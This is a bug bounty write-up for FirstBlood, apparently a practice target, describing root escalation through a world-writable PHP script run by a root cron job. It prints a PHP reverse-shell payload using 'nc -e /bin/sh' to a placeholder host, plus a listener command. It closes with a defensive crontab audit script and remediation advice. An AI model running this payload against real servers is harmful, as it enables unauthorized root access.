FirstBlood-#681 — Root access on the web server
This issue was discovered on FirstBlood v2
On 2021-10-27, shivam18u Level 3 reported:
Hi sean,
I found a way to get root access on the server.
I have mentioned the steps to get RCE with fb-exec account access. With that access, we can further get root access.
https://www.bugbountyhunter.com/hackevents/report?id=633
After getting the fb-exec access, you can see the /app/docker/crontab file.
![](https://res.cloudinary.com/bugbountynotes/image/upload/v1635334579/r9pvsorbid6ixtvb7vhs.png)
The crontab runs the scheduler.php file as root every minute.
So, if we edit the scheduler.php file, we can get a reverse shell to our VPS.
![](https://res.cloudinary.com/bugbountynotes/image/upload/v1635334578/sdy9cxqbilclcipibaf7.png)
We can echo PHP code that calls the system function into scheduler.php to run the required command.

```sh
# Overwrite the root-run scheduler with a PHP reverse shell.
# Replace IP ADDRESS with the VPS host and the port the listener below uses (7070).
# Note: the -e option is only available in some nc builds (e.g. nc.traditional / ncat).
echo '<?php system("nc IP ADDRESS -e /bin/sh");?>' > scheduler.php
```
![](https://res.cloudinary.com/bugbountynotes/image/upload/v1635335086/uwjt16wudon5hrssw2gv.png)
After editing the file, start a listener on your VPS.

```sh
nc -nvlp 7070
```
You will get a connection within a minute. You can check the user.
![](https://res.cloudinary.com/bugbountynotes/image/upload/v1635335142/n7ejix6biogekleghzzb.png)
Have a nice day!!
P1 CRITICAL
Endpoint: .
Parameter: .
Payload: .
FirstBlood ID: 35
Vulnerability Type: RCE
A cron job executes /app/firstblood/scheduler.php every minute as root. That file is writable by the FirstBlood PHP pool user (fb-exec), so the [checkproof bug] (which yields code execution as fb-exec) can be combined with this to obtain root privileges.
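The root cause is a generic one: a root cron job whose command line points at a file the unprivileged service account can write. The audit helper below is an added example for this page, not FirstBlood code and not part of the original report. It parses a system-format crontab (minute hour dom mon dow user command, the layout of /app/docker/crontab) and prints every absolute path that a root-owned job invokes and that the current user can write; the `demo_audit` function, the temp-dir paths and the sample crontab it builds are constructed for the demonstration. Run the check as the low-privilege account (here fb-exec): `[ -w ]` is true for every file when you are already root, so the result is only meaningful from the unprivileged side.

```sh
#!/bin/sh
# Added audit helper (not FirstBlood code, not part of the original report).
# Lists absolute paths in root cron jobs that the CURRENT user can write.
# Any hit is the primitive this report uses: whatever root runs next minute
# is ours to edit. Run as the unprivileged user, never as root.

# writable_root_cron_targets CRONTAB_FILE
writable_root_cron_targets() {
    # Skip comments, blank lines and VAR=value assignments (PATH=..., MAILTO=...).
    grep -Ev '^[[:space:]]*(#|$|[A-Za-z_][A-Za-z0-9_]*=)' "$1" |
    while read -r f1 f2 f3 f4 f5 f6 rest; do
        case "$f1" in
            @*) user=$f2; cmd="$f3 $f4 $f5 $f6 $rest" ;;   # @reboot / @hourly form
            *)  user=$f6; cmd=$rest ;;                      # five time fields, then user
        esac
        [ "$user" = "root" ] || continue
        # Every absolute path on the command line is a candidate: the
        # interpreter, the script it runs, config files it loads, and so on.
        for tok in $cmd; do
            case "$tok" in
                /*) if [ -w "$tok" ]; then printf '%s\n' "$tok"; fi ;;
            esac
        done
    done
}

# demo_audit builds a constructed crontab shaped like the report's
# /app/docker/crontab (hypothetical paths under a temp dir) and audits it.
# Expected: only the writable scheduler.php is printed; the www-data job is
# skipped because it does not run as root, and missing.sh does not exist.
demo_audit() {
    dir=$(mktemp -d)
    mkdir -p "$dir/app/firstblood"
    printf '<?php // stand-in for the real scheduler\n' > "$dir/app/firstblood/scheduler.php"
    chmod 666 "$dir/app/firstblood/scheduler.php"     # writable by the pool user, as found
    printf '<?php // job that never runs as root\n' > "$dir/app/firstblood/www-job.php"
    cat > "$dir/crontab" <<EOF
# constructed sample crontab
PATH=/usr/local/bin:/usr/bin:/bin
* * * * * root php $dir/app/firstblood/scheduler.php
* * * * * www-data php $dir/app/firstblood/www-job.php
@reboot root $dir/app/firstblood/missing.sh
EOF
    writable_root_cron_targets "$dir/crontab"
    rm -rf "$dir"
}

demo_audit
```

The fix on the defender's side follows from the same check: anything a root cron job executes or includes must be owned by root and not writable by the pool user, and that applies to the parent directories as well, since a writable directory lets the attacker replace the file even when the file itself is read-only. Alternatively, run the scheduler under the pool user so that editing it gains nothing.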